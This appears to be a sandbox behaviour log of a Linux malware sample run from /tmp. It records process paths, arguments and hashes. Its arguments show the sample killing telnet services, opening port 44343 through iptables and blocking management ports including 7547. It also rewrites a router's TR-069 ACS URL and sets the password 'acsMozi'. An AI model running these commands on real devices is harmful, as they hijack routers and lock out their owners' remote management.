                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:43
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:43
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:43
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:43
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:43
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/usr/bin/killall
                                                                                                                        Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                                        File size:23736 bytes
                                                                                                                        MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                                        General

                                                                                                                        Start time:20:58:44
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:44
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:44
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:n/a
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/modprobe
                                                                                                                        Arguments:/sbin/modprobe ip_tables
                                                                                                                        File size:9 bytes
                                                                                                                        MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 44343 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 44343 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:58:49
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:54
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:58:59
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 58000 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 35000 -j DROP
                                                                                                                        File size:13 bytes
                                                                                                                        MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/tmp/MGuvcs6Ocz
                                                                                                                        Arguments:n/a
                                                                                                                        File size:307960 bytes
                                                                                                                        MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/bin/sh
                                                                                                                        Arguments:n/a
                                                                                                                        File size:4 bytes
                                                                                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                        General

                                                                                                                        Start time:20:59:04
                                                                                                                        Start date:25/04/2021
                                                                                                                        Path:/sbin/iptables
                                                                                                                        Arguments:iptables -I INPUT -p tcp --dport 50023 -j DROP
                                                                                                                        File size:13 bytes
